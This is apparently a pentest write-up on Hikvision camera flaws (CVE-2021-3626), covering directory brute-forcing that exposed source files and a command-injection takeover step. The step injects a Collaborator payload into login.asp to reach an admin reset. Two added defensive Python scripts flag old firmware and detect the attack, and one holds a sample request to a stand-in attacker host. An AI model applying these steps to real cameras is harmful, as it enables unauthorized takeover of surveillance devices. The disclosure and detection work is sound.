Exploiting Flaws on Hikvision Cameras

As the Internet of Things (IoT) proliferates, cybercriminals are turning their attention to the billions of devices connected to the Internet, drawn by security that is weak, neglected, and sometimes non-existent.

Manufacturers may prioritize functionality and cost-efficiency over security, leaving these devices with vulnerabilities that make them easy targets for attackers seeking unauthorized access and control. IoT devices also often run firmware that neither manufacturers nor users update regularly, so known vulnerabilities go unpatched and the devices remain exposed to exploitation.

Securing IoT devices requires a thorough evaluation of the vendor, the firmware, and the patch management capabilities before making any investment. Understanding why security cameras can be hacked, and illustrating the impact, requires a certain skill.

By sharing some of our techniques with our community, we aim to emphasize the importance of selecting providers with this expertise for your security assessments. Our intention is not to divulge secrets but to present facts that highlight the seriousness of these issues and the damage an attacker can do if they are ignored.

Black Hat Ethical Hacking's objective was to show the value of going beyond vulnerability identification, where many stop, by providing concrete evidence of the real impact through exploitation, together with effective remediation strategies for the Blue Team (defenders). Leveraging skills gained from bug bounty hunting programs, we can perform penetration testing at a markedly more effective level, specifically for the proof-of-concept (PoC) exploitation part.

In this write-up, we dig into the security of Hikvision security cameras by presenting the findings and vulnerabilities identified during a comprehensive penetration test conducted by our Red Team. We then exploited those vulnerabilities to demonstrate their true impact, going beyond simple detection and vulnerability identification.


Vulnerability (1): Hikvision Security Camera, Source Code Disclosure and Takeover via CMD Injection

Weakness type: 

CVE-2021-3626: Command Injection in the web server of some Hikvision products

Risk Description

We chained two successful attacks on this Hikvision IP camera and combined them into one Critical issue.

Command Injection Attack:

A command injection vulnerability exists in the web server of some Hikvision products. Due to insufficient input validation, an attacker can exploit the vulnerability to launch a command injection attack by sending messages containing malicious commands.

We managed to inject a command directly into your camera's built-in firmware, which would allow us to reactivate the admin account and completely take over the camera. We did not proceed with doing this, but we did reach the point where we could, and we included screenshots taken just before takeover to prove it. In short, we performed the exploit to prove that the recently disclosed vulnerability is valid and that no false positives were reported. All of this was done manually.

Source code disclosure:

After brute-forcing the IP camera's directories, with no security mechanism blocking our requests, we discovered the configuration files and scripts containing the camera's controls, as we show below.

We pursued this because we noticed the firmware dated from 2017 while the CVE was published in 2021; that told us the firmware was outdated, so we proceeded to attack the camera based on our research into this particular CVE.

Command injection is a critical issue: it allows executing commands as admin directly on the camera and thereby controlling it.

Technical Analysis:

As you can see here:

http://XXX/doc/page/login.asp?_1651847976739

This is the camera's main login page; note the date 2017 at the bottom:

We used Burp Suite Pro and other tools to perform several recon scans, discovering content and brute-forcing directories, which ended up revealing the source code of several camera functionalities. Here are some of the links; the rest are uploaded to your cloud folder under "camera attack".

Links

Source Code Login Mechanisms, showing how and who can log in:

http://XXX/doc/i18n/en/Login.json?version=V4.0.1build170814 


Source Code Wizard Mechanisms, showing all operations of the configuration of the IP Camera:

http://XXX/doc/i18n/en/Wizard.json?version=V4.0.1build170814 

http://XXX/doc/i18n/en/Common.json?version=V4.0.1build170814
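The links above carry a build string, V4.0.1build170814, whose last six digits are a YYMMDD build date; that is how the 2017 firmware date was established against the 2021 CVE. As an added example (not code from the original write-up or from Hikvision), the script below pulls that parameter out of camera resource URLs, decodes the version and build date, and flags any camera whose build precedes a cutoff date the defender chooses, so an inventory of cameras can be screened for stale firmware. It assumes the version query parameter reflects the running firmware build; the host camera.example and the cutoff of 2021-01-01 are constructed placeholders (the page states only that the CVE dates from 2021, not a specific fixed build).

```python
import re
from datetime import date
from urllib.parse import urlparse, parse_qs

# Build strings such as "V4.0.1build170814" (seen in the camera's resource URLs):
# dotted version, the literal "build", then a YYMMDD build date.
BUILD_RE = re.compile(
    r"^V(?P<ver>\d+(?:\.\d+)*)build(?P<yy>\d{2})(?P<mm>\d{2})(?P<dd>\d{2})$"
)


def parse_build(build):
    """Return (version_tuple, build_date) or None if the string is not in the expected form."""
    m = BUILD_RE.match(build)
    if not m:
        return None
    version = tuple(int(part) for part in m.group("ver").split("."))
    try:
        built = date(2000 + int(m.group("yy")), int(m.group("mm")), int(m.group("dd")))
    except ValueError:  # e.g. month 13: malformed date, treat as unparseable
        return None
    return version, built


def build_from_url(url):
    """Pull the 'version' query parameter out of a camera resource URL, if present."""
    values = parse_qs(urlparse(url).query).get("version")
    return values[0] if values else None


def assess(url, cutoff):
    """Flag a camera resource URL whose embedded build date precedes `cutoff`.

    `cutoff` may be a datetime.date or an ISO string such as "2021-01-01".
    """
    if isinstance(cutoff, str):
        cutoff = date.fromisoformat(cutoff)
    build = build_from_url(url)
    parsed = parse_build(build) if build else None
    if parsed is None:
        # No build string (or an unrecognised one): nothing to conclude from this URL.
        return {"url": url, "build": build, "version": None, "build_date": None,
                "outdated": None, "age_days": None}
    version, built = parsed
    return {"url": url, "build": build, "version": version, "build_date": built,
            "outdated": built < cutoff, "age_days": (cutoff - built).days}


def assess_inventory(urls, cutoff):
    """Assess every URL in an inventory list; returns one result dict per URL."""
    return [assess(url, cutoff) for url in urls]


if __name__ == "__main__":
    # Constructed inventory; "camera.example" stands in for the XXX host in the write-up.
    CUTOFF = "2021-01-01"  # placeholder cutoff, not a vendor-stated fixed build
    inventory = [
        "http://camera.example/doc/i18n/en/Login.json?version=V4.0.1build170814",
        "http://camera.example/doc/i18n/en/Wizard.json?version=V4.0.1build170814",
        "http://camera.example/doc/page/login.asp?_1651847976739",
    ]
    for result in assess_inventory(inventory, CUTOFF):
        if result["outdated"] is None:
            print(f"{result['url']}: no build string found")
        else:
            state = "OUTDATED" if result["outdated"] else "ok"
            print(f"{result['url']}: {result['build']} built {result['build_date']} "
                  f"({result['age_days']} days before cutoff) -> {state}")
```

Feeding the script the resource URLs the web UI loads (for example from a proxy log of a single login page visit) gives a quick, read-only way to spot cameras still running builds from before a vendor advisory, without touching the device beyond a normal page load.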


Proof of Concept (PoC)

To perform the source code reveal, open a terminal in Linux and use the curl command shown in the first screenshot:

Screenshot 1: https://media.licdn.com/dms/image/D4E12AQFLNDeUfnJT6Q/article-inline_image-shrink_1500_2232/0/1688812681005?e=1694649600&v=beta&t=1L4oFN6OCl_lO3-QDLjhLoRY32i3e5gdKIGR45H46eU

Then this:

Screenshot 2: https://media.licdn.com/dms/image/D4E12AQGoXaS5Se4gNw/article-inline_image-shrink_1500_2232/0/1688675771288?e=1694649600&v=beta&t=0Ahd2F5cvbk9OThBUF9EnFyvgD3n79jFWlUp8sfPeLw

And this:

Screenshot 3: https://media.licdn.com/dms/image/D4E12AQH9nBBcTtQ9TA/article-inline_image-shrink_1500_2232/0/1688675815844?e=1694649600&v=beta&t=gEZwDKEulQomFajHCB7-AOvptwFgNQeLdxb1C1EzulM

Complete Takeover, Admin Reset via Command Injection:

To do this, open Burp Suite, use Collaborator, generate the payload, and inject it into this section:

http://XXX/doc/page/login.asp?//[INSERTPAYLOAD]/xss.js

This should allow you to pop up the admin password reset:

https://media.licdn.com/dms/image/D4E12AQGbv6Pp6iRLsA/article-inline_image-shrink_1500_2232/0/1688675937015?e=1694649600&v=beta&t=l-EczzDqOoLQk-smKo3u0Hqw44OkZP13uqRSGTY70is

https://media.licdn.com/dms/image/D4E12AQFwB6Xv_uHu1Q/article-inline_image-shrink_1500_2232/0/1688676042513?e=1694649600&v=beta&t=44onaBoebj5zl3TS3rqsT_7idcRl2QTY6j9-bKGmwko
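Two things in this section leave a visible trace in web traffic: the directory brute-force that found the source files (a burst of 404s under /doc/ from one client) and the takeover step, which puts a scheme-relative URL (//host/...) into the login.asp query string, something the login page never needs. As an added example for defenders (not code from the original write-up), the script below runs both checks over access-log lines in combined log format. It assumes a reverse proxy or IDS in front of the camera produces such a log, since the camera itself may not; the log lines, client addresses and the host attacker-host.example are constructed sample data.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format: client, identd, user, [timestamp], "METHOD path proto", status, bytes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)

# A login.asp query that begins with "//" plus a host is a scheme-relative URL,
# the shape used to pull a script from an outside host; no legitimate login
# request carries one (the normal cache-buster looks like "?_1651847976739").
EXTERNAL_REF_RE = re.compile(r"/doc/page/login\.asp\?//[^/\s]+/")


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect(lines, window=timedelta(seconds=60), threshold=20):
    """Return (kind, client_ip, detail) alerts for the two patterns described above."""
    alerts = []
    doc_404s = defaultdict(list)  # client ip -> timestamps of recent 404s under /doc/
    for raw in lines:
        rec = parse_line(raw)
        if rec is None:
            continue
        if EXTERNAL_REF_RE.search(rec["path"]):
            alerts.append(("login_page_external_script", rec["ip"], rec["path"]))
        if rec["path"].startswith("/doc/") and rec["status"] == 404:
            history = doc_404s[rec["ip"]]
            history.append(rec["ts"])
            # Slide the window: forget 404s older than `window` before this request.
            while history and rec["ts"] - history[0] > window:
                history.pop(0)
            # Alert exactly once when the burst first reaches the threshold.
            if len(history) == threshold:
                alerts.append(("doc_directory_bruteforce", rec["ip"],
                               f"{threshold} 404s under /doc/ within {int(window.total_seconds())}s"))
    return alerts


# Constructed sample log: two benign page loads, a 25-request probe burst, then
# a login.asp request referencing an outside host. Not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [09/May/2022:14:00:00 +0000] "GET /doc/page/login.asp?_1651847976739 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [09/May/2022:14:00:01 +0000] "GET /doc/i18n/en/Login.json?version=V4.0.1build170814 HTTP/1.1" 200 2210',
] + [
    f'198.51.100.7 - - [09/May/2022:14:01:{i:02d} +0000] "GET /doc/page/guess{i}.asp HTTP/1.1" 404 162'
    for i in range(25)
] + [
    '198.51.100.7 - - [09/May/2022:14:02:00 +0000] "GET /doc/page/login.asp?//attacker-host.example/xss.js HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for kind, ip, detail in detect(SAMPLE_LOG):
        print(f"{kind:28} {ip:15} {detail}")
```

Both rules are cheap enough to run on a SIEM or directly on the proxy: the 404 burst catches the reconnaissance that precedes source-code disclosure, and the login.asp rule catches the specific request shape the takeover step depends on, which also makes a good candidate for a blocking rule on the proxy rather than just an alert.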



Disclaimer:

The information provided by DEVCON and anyone associated with it is intended for educational purposes only. The techniques discussed are meant to be used responsibly, with proper consent and authorized access. The findings do not disclose any client information or sensitive information; everything has been edited to keep only what is necessary. BHEH and its members do not accept any responsibility for the misuse or illegal use of these techniques. It is essential to abide by applicable laws, regulations, and ethical guidelines when conducting any security assessments or penetration testing activities.

Always seek proper authorization and obtain consent before performing any actions that may impact the security or privacy of systems and networks.
